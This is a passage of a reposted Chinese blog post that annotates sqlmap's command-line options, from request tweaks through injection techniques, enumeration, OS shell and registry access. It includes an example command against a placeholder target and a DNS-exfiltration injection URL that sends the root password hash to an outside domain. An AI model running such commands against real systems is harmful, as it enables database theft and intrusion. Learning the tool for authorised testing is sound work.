  129.     --safe-freq=SAFE..  Test requests between two visits to a given safe URL  
  130.         设置访问安全url的时间间隔  
  131.     --skip-urlencode    Skip URL encoding of payload data  
  132.         不进行url编码  
  133.     --csrf-token=CSR..  Parameter used to hold anti-CSRF token  
  134.         设置CSRF的token  
  135.     --csrf-url=CSRFURL  URL address to visit to extract anti-CSRF token  
  136.   
  137.     --force-ssl         Force usage of SSL/HTTPS  
  138.         强制使用https  
  139.     --hpp               Use HTTP parameter pollution method  
  140.         尝试了一下,只能用于ASP,得到报错信息如下:  
  141.         [WARNING] HTTP parameter pollution should work only against ASP(.NET) targets  
  142.   
  143.     --eval=EVALCODE     Evaluate provided Python code before the request (e.g.  
  144.                         "import hashlib;id2=hashlib.md5(id).hexdigest()")  
  145.         发送请求之前,先运行这段python代码,比如对某个参数进行处理  
  146.         比如下面的,hash参数就是id的md5值  
  147.         python sqlmap.py -u "http://www.target.com/vuln.php?id=1&hash=c4ca4238a0b923820dcc509a6f75849b" --eval="import hashlib;hash=hashlib.md5(id).hexdigest()"  
  148.   
  149.   Optimization: 一些优化  
  150.     These options can be used to optimize the performance of sqlmap  
  151.   
  152.     -o                  Turn on all optimization switches  
  153.         开启所有优化选项  
  154.     --predict-output    Predict common queries output  
  155.         预测常见的查询输出,可能跟一些报错出数据库信息那些有关,具体应要看源码才能说,有机会的话我看源码补充下  
  156.     --keep-alive        Use persistent HTTP(s) connections  
  157.         使用持久连接  
  158.     --null-connection   Retrieve page length without actual HTTP response body  
  159.         获得页面的长度(应该有多少字符吧,这个具体我也不确定) 除去HTTP的响应的body部分  
  160.     --threads=THREADS   Max number of concurrent HTTP(s) requests (default 1)  
  161.         设置线程,默认为1  
  162.   
  163.   Injection: 注入  
  164.     These options can be used to specify which parameters to test for,  
  165.     provide custom injection payloads and optional tampering scripts  
  166.   
  167.     -p TESTPARAMETER    Testable parameter(s)  
  168.         设定测试的参数,sqlmap默认测试所有的GET和POST参数,当--level的值大于等于2的时候也会测试HTTP Cookie头的值,当大于等于3的时候也会测试User-Agent和HTTP Referer头的值。  
  169.         这里就给你自己设定了 例如: -p "id,user-agent"  
  170.   
  171.     --skip=SKIP         Skip testing for given parameter(s)  
  172.         跳过测试给定的参数  
  173.     --skip-static       Skip testing parameters that not appear dynamic  
  174.         跳过测试参数是否是静态的  
  175.     --dbms=DBMS         Force back-end DBMS to this value  
  176.         指定后端的数据库类型(mysql,mssql等)  
  177.     --dbms-cred=DBMS..  DBMS authentication credentials (user:password)  
  178.         指定数据库的认证信息(user:password)  
  179.     --os=OS             Force back-end DBMS operating system to this value  
  180.         指定后台的系统类型  
  181.     --invalid-bignum    Use big numbers for invalidating values  
  182.         使用大数字(说是无效值),比如payload会出现8446744073709551610这样大的,配合-v 3就能看到  
  183.     --invalid-logical   Use logical operations for invalidating values  
  184.         使用逻辑字符,比如下面的:  
  185.             SELECT CHR(101)&CHR(99)&CHR(108)&CHR(89)  
  186.             SELECT CHAR(82)+CHAR(90)+CHAR(71)+CHAR(84))  
  187.             SELECT CHAR(67)||CHAR(88)||CHAR(73)||CHAR(105)  
  188.     --invalid-string    Use random strings for invalidating values  
  189.         使用随机字符  
  190.     --no-cast           Turn off payload casting mechanism  
  191.         这个看着英文像是关闭payload构造机制  
  192.     --no-escape         Turn off string escaping mechanism  
  193.         关闭字符串逃逸机制  
  194.     --prefix=PREFIX     Injection payload prefix string  
  195.         设置注入的前缀,比如单引号注入点就设置前缀为单引号  
  196.     --suffix=SUFFIX     Injection payload suffix string  
  197.         设置注入payload的后缀  
  198.     --tamper=TAMPER     Use given script(s) for tampering injection data  
  199.         使用给定的脚本去修改payload中的数据,达到绕过WAF的目的  
  200.   
  201.   Detection: 发现  
  202.     These options can be used to customize the detection phase  
  203.   
  204.     --level=LEVEL       Level of tests to perform (1-5, default 1)  
  205.         这个的话,sqlmap使用测试的方法就越多,发送越多请求,耗时也越长  
  206.     --risk=RISK         Risk of tests to perform (1-3, default 1)  
  207.         boolean-based blind SQL injection tests with AND are considered risk 1, with OR are considered risk 3:这句话是从sqlmap配置文件中找的,就是说基于布尔型盲注and型的就是risk1,or型的就是risk3,那么risk2是两个都搞?  
  208.     --string=STRING     String to match when query is evaluated to True  
  209.         设置一些返回页面中的字符,页面返回这个字符,说明我们的注入判断语句是正确的  
  210.     --not-string=NOT..  String to match when query is evaluated to False  
  211.         设置返回页面没返回某个字符,就是判断错误  
  212.     --regexp=REGEXP     Regexp to match when query is evaluated to True  
  213.         用正则匹配告诉sqlmap返回什么是正确的  
  214.     --code=CODE         HTTP code to match when query is evaluated to True  
  215.         用HTTP的响应码来判断注入判断语句是正确的,例如,响应200的时候为真,响应401的时候为假,可以添加参数--code=200  
  216.     --text-only         Compare pages based only on the textual content  
  217.         真条件下的返回页面与假条件下返回页面是不同可以使用这个  
  218.     --titles            Compare pages based only on their titles  
  219.         真条件下的返回页面的标题与假条件下返回页面的标题是不同可以使用这个  
  220.   
  221.   Techniques: 注入技术  
  222.     These options can be used to tweak testing of specific SQL injection  
  223.     techniques  
  224.   
  225.     --technique=TECH    SQL injection techniques to use (default "BEUSTQ")  
  226.         指定注入技术,默认使用全部(default "BEUSTQ"),那个含义如下:  
  227.         # B: Boolean-based blind SQL injection  
  228.         # E: Error-based SQL injection  
  229.         # U: UNION query SQL injection  
  230.         # S: Stacked queries SQL injection  
  231.         # T: Time-based blind SQL injection  
  232.         # Q: Inline SQL injection  
  233.     --time-sec=TIMESEC  Seconds to delay the DBMS response (default 5)  
  234.         使用基于时间的盲注时,设置的数据库延迟,默认是5  
  235.     --union-cols=UCOLS  Range of columns to test for UNION query SQL injection  
  236.         设置联合查询列的数目的范围  
  237.     --union-char=UCHAR  Character to use for bruteforcing number of columns  
  238.         设定union查询使用的字符,默认使用NULL  
  239.     --union-from=UFROM  Table to use in FROM part of UNION query SQL injection  
  240.         这个就不知道了,使用表单中的元素放到union注入中?  
  241.     --dns-domain=DNS..  Domain name used for DNS exfiltration attack  
  242.         利用dns进行注入加快盲注,可以看看这个  
  243.         http://blog.csdn.net/qq_27446553/article/details/51794326  
  244.         示例url:http://localhost/inject.php?user=123' and if((SELECT LOAD_FILE(CONCAT(、\\\',(SELECT concat(user,'_',mid(password,2,41)) from user where ser='root' limit 1),'.md5crack.cn\\foobar'))),1,1)%23   
  245.     --second-order=S..  Resulting page URL searched for second-order response  
  246.         这个就是我们常说的二次注入了,设置后帮你寻找二次注入的页面,不过没用过。。。  
  247.   
  248.   Fingerprint:  
  249.     -f, --fingerprint   Perform an extensive DBMS version fingerprint  
  250.         这个应该是数据库指纹识别,加了可能识别更好  
  251.   Enumeration:  
  252.     These options can be used to enumerate the back-end database  
  253.     management system information, structure and data contained in the  
  254.     tables. Moreover you can run your own SQL statements  
  255.   
  256.     -a, --all           Retrieve everything  
  257.         检索所有,这是拖库的节奏啊  
  258.     -b, --banner        Retrieve DBMS banner  
  259.         检索数据库的一些标志性的信息,就是指纹这样子吧  
  260.     --current-user      Retrieve DBMS current user  
  261.         检索当前连接数据库的用户  
  262.     --current-db        Retrieve DBMS current database  
  263.         检索当前连接的数据库  
  264.     --hostname          Retrieve DBMS server hostname  
  265.         检索服务器的主机名  
  266.     --is-dba            Detect if the DBMS current user is DBA  
  267.         检测是不是dba,就是root权限咯  
  268.     --users             Enumerate DBMS users  
  269.         枚举数据库用户  
  270.     --passwords         Enumerate DBMS users password hashes  
  271.         枚举数据库用户的哈希值  
  272.     --privileges        Enumerate DBMS users privileges  
  273.         枚举数据库用户的权限  
  274.     --roles             Enumerate DBMS users roles  
  275.         枚举数据库用户的角色  
  276.     --dbs               Enumerate DBMS databases  
  277.         枚举数据库有哪些  
  278.     --tables            Enumerate DBMS database tables  
  279.         枚举数据表名  
  280.     --columns           Enumerate DBMS database table columns  
  281.         枚举列名  
  282.     --schema            Enumerate DBMS schema  
  283.         这个测试过,将所有的数据库的表的基本信息都枚举了,有哪些列,列的数据类型,具体数据就没有枚举  
  284.     --count             Retrieve number of entries for table(s)  
  285.         枚举表格个数  
  286.     --dump              Dump DBMS database table entries  
  287.         输出数据库表的数据  
  288.     --dump-all          Dump all DBMS databases tables entries  
  289.         输出所有  
  290.     --search            Search column(s), table(s) and/or database name(s)  
  291.         查找特定的列名,表名或数据库名,配合下面的-D,-C,-T  
  292.     --comments          Retrieve DBMS comments  
  293.         枚举数据库的注释  
  294.     -D DB               DBMS database to enumerate  
  295.         指定数据库名  
  296.     -T TBL              DBMS database table(s) to enumerate  
  297.         指定表名  
  298.     -C COL              DBMS database table column(s) to enumerate  
  299.         指定列名  
  300.     -X EXCLUDECOL       DBMS database table column(s) to not enumerate  
  301.         指定不枚举那个列  
  302.     -U USER             DBMS user to enumerate  
  303.         枚举用户,但单独用这个参数感觉没什么用啊,这个可能要看源码才能解决了,估计要配合其他参数  
  304.     --exclude-sysdbs    Exclude DBMS system databases when enumerating tables  
  305.         枚举时排除系统的数据库  
  306.     --pivot-column=P..  Pivot column name  
  307.         以某一列为核心?这个用过没感觉出什么用  
  308.     --where=DUMPWHERE   Use WHERE condition while table dumping  
  309.         使用where调试限制table的输出  
  310.     --start=LIMITSTART  First query output entry to retrieve  
  311.         指定开始从第几行开始输出,如--start=3,前两行就不输出了  
  312.     --stop=LIMITSTOP    Last query output entry to retrieve  
  313.         指定从第几行开始停止输出  
  314.     --first=FIRSTCHAR   First query output word character to retrieve  
  315.         指定只输出第几个字符开始输出,盲注才有效,亲测  
  316.     --last=LASTCHAR     Last query output word character to retrieve  
  317.         指定只输出第几个字符停止输出,盲注才有效,亲测,跟上面的配合指定范围,  
  318.         如 :--first 3 --last 5  只输出3到5位置的字符  
  319.     --sql-query=QUERY   SQL statement to be executed  
  320.         指定执行我们的sql语句  
  321.     --sql-shell         Prompt for an interactive SQL shell  
  322.         返回一个sql的shell  
  323.     --sql-file=SQLFILE  Execute SQL statements from given file(s)  
  324.         从文件中读取执行sql语句  
  325.   
  326.   Brute force: 爆破  
  327.     These options can be used to run brute force checks  
  328.   
  329.     --common-tables     Check existence of common tables  
  330.         检测常见的表名  
  331.     --common-columns    Check existence of common columns  
  332.         检测常见的列名  
  333.   
  334.   User-defined function injection: 使用用户定义的函数注入  
  335.     These options can be used to create custom user-defined functions  
  336.   
  337.     --udf-inject        Inject custom user-defined functions  
  338.     --shared-lib=SHLIB  Local path of the shared library  
  339.         这两个具体没用过,直译就是注入用户定义的函数,另一个就是指定本地共享库  
  340.   
  341.   File system access:  文件系统访问  
  342.     These options can be used to access the back-end database management  
  343.     system underlying file system  
  344.   
  345.     --file-read=RFILE   Read a file from the back-end DBMS file system  
  346.         读取服务器文件  
  347.     --file-write=WFILE  Write a local file on the back-end DBMS file system  
  348.         写服务器文件  
  349.     --file-dest=DFILE   Back-end DBMS absolute filepath to write to  
  350.         设置写入的绝对路径  
  351.   
  352.   Operating system access:  操作系统访问  
  353.     These options can be used to access the back-end database management  
  354.     system underlying operating system  
  355.   
  356.     注意下面这些要有相应的权限,一般要root  
  357.   
  358.     --os-cmd=OSCMD      Execute an operating system command  
  359.         执行一个指定的命令  
  360.     --os-shell          Prompt for an interactive operating system shell  
  361.         返回一个shell  
  362.     --os-pwn            Prompt for an OOB shell, Meterpreter or VNC  
  363.         这个参数需要访问metasploit,结合metasploit使用的  
  364.     --os-smbrelay       One click prompt for an OOB shell, Meterpreter or VNC  
  365.         这个参数也需要访问metasploit  
  366.     --os-bof            Stored procedure buffer overflow exploitation  
  367.         尝试储存过程的缓冲区溢出  
  368.     --priv-esc          Database process user privilege escalation  
  369.         利用数据库进程用户进行权限提升  
  370.     --msf-path=MSFPATH  Local path where Metasploit Framework is installed  
  371.         指定metasploit的路径  
  372.     --tmp-path=TMPPATH  Remote absolute path of temporary files directory  
  373.         设定临时文件路径  
  374.   
  375.   Windows registry access: windows注册表访问  
  376.     These options can be used to access the back-end database management  
  377.     system Windows registry  
  378.   
  379.     --reg-read          Read a Windows registry key value  
  380.         读取一个键  
  381.     --reg-add           Write a Windows registry key value data  
  382.         写一个键  
  383.     --reg-del           Delete a Windows registry key value  
  384.         删除一个键  
  385. 下面的应该配合上面使用的  
  386.     --reg-key=REGKEY    Windows registry key  
  387.         指定键  
  388.     --reg-value=REGVAL  Windows registry key value  
  389.         指定键值  
  390.     --reg-data=REGDATA  Windows registry key value data  
  391.         值的数据  
  392.     --reg-type=REGTYPE  Windows registry key value type  
  393.         值得类型  
  394.   
  395.   General: 通用的  
  396.     These options can be used to set some general working parameters  
  397.   
  398.     -s SESSIONFILE      Load session from a stored (.sqlite) file  
  399.         从.sqlite恢复那个会话(注入过就会自动生成),那个文件在sqlmap的output文件,(windows在C:\Users\Administrator\.sqlmap\output\)  
  400.     -t TRAFFICFILE      Log all HTTP traffic into a textual file  
  401.         HTTP请求保存到文件中  
  402.     --batch             Never ask for user input, use the default behaviour  
  403.         不要询问,使用默认选项  
  404.     --binary-fields=..  Result fields having binary values (e.g. "digest")  
  405.         设置有些字段是二进制数值?  
  406.     --charset=CHARSET   Force character encoding used for data retrieval  
  407.         设置编码  
  408.     --crawl=CRAWLDEPTH  Crawl the website starting from the target URL  
  409.         从某个url开始爬取网站  
  410.     --crawl-exclude=..  Regexp to exclude pages from crawling (e.g. "logout")  
  411.         排除爬取网站的关键字,如logout  
  412.     --csv-del=CSVDEL    Delimiting character used in CSV output (default ",")  
  413.         设置输出结果时的分隔符  
  414.     --dump-format=DU..  Format of dumped data (CSV (default), HTML or SQLITE)  
  415.         设置输出是的格式,csv,html,SQLITE等  
  416.     --eta               Display for each output the estimated time of arrival  
  417.         显示每个输出估计的耗时  
  418.     --flush-session     Flush session files for current target  
  419.         刷新这个url的储存会话信息,就是更新以前注入的记录,如管理员改密码了,就要重新注入了  
  420.     --forms             Parse and test forms on target URL  
  421.         解析测试目标url的表单  
  422.     --fresh-queries     Ignore query results stored in session file  
  423.         忽略保存在会话文件储存的查询结果  
  424.     --hex               Use DBMS hex function(s) for data retrieval  
  425.         使用十六进制  
  426.     --output-dir=OUT..  Custom output directory path  
  427.         设置输出路径  
  428.     --parse-errors      Parse and display DBMS error messages from responses  
  429.         解析输出数据库错误信息  
  430.     --save=SAVECONFIG   Save options to a configuration INI file  
  431.         保存选项到ini文件  
  432.     --scope=SCOPE       Regexp to filter targets from provided proxy log  
  433.         正则表达式过滤代理文件提供的代理?  
  434.     --test-filter=TE..  Select tests by payloads and/or titles (e.g. ROW)  
  435.         设置含我们指定关键字的某些测试的payload  
  436.     --test-skip=TEST..  Skip tests by payloads and/or titles (e.g. BENCHMARK)  
  437.         跳过测试指定关键字的某些测试的payload  
  438.     --update            Update sqlmap  
  439.         更新sqlmap,记得更新了  
  440.   
  441.   Miscellaneous:  杂项  
  442.     -z MNEMONICS        Use short mnemonics (e.g. "flu,bat,ban,tec=EU")  
  443.         短记忆,什么鬼  
  444.     --alert=ALERT       Run host OS command(s) when SQL injection is found  
  445.         如果存在注入,运行系统命令  
  446.     --answers=ANSWERS   Set question answers (e.g. "quit=N,follow=N")  
  447.         设定  
  448.     --beep              Beep on question and/or when SQL injection is found  
  449.         哔一声,找到注入的话  
  450.     --cleanup           Clean up the DBMS from sqlmap specific UDF and tables  
  451.         清理数据库什么鬼,这个也不懂     
  452.     --dependencies      Check for missing (non-core) sqlmap dependencies  
  453.         看看sqlmap缺少什么第三方库  
  454.     --disable-coloring  Disable console output coloring  
  455.         关闭颜色的输出,就没那么美观咯  
  456.     --gpage=GOOGLEPAGE  Use Google dork results from specified page number  
  457.         指定google搜索的页码,找sqlmap注入目标  
  458.     --identify-waf      Make a thorough testing for a WAF/IPS/IDS protection  
  459.         尝试辨认WAF/IPS/IDS的类型  
  460.     --mobile            Imitate smartphone through HTTP User-Agent header  
  461.         使用手机User-Agent  
  462.     --offline           Work in offline mode (only use session data)  
  463.         使用离线模式  
  464.     --page-rank         Display page rank (PR) for Google dork results  
  465.         显示该url,google的rank值  
  466.     --purge-output      Safely remove all content from output directory  
  467.         安全地删除output文件夹  
  468.     --skip-waf          Skip heuristic detection of WAF/IPS/IDS protection  
  469.         跳过探测WAF/IPS/IDS  
  470.     --smart             Conduct thorough tests only if positive heuristic(s)  
  471.         全面的扫描如果是积极的启发式,不知什么鬼  
  472.     --sqlmap-shell      Prompt for an interactive sqlmap shell  
  473.         交互式的sqlmap shell  
  474.     --tmp-dir=TMPDIR    Local directory for storing temporary files  
  475.         设置临时文件目录  
  476.     --wizard            Simple wizard interface for beginner users  
  477.         为初学者用户提供简单的向导,就是问你那个url,一步步问下去  

猜你喜欢

转载自blog.csdn.net/tang12060/article/details/79727028
hh
.hh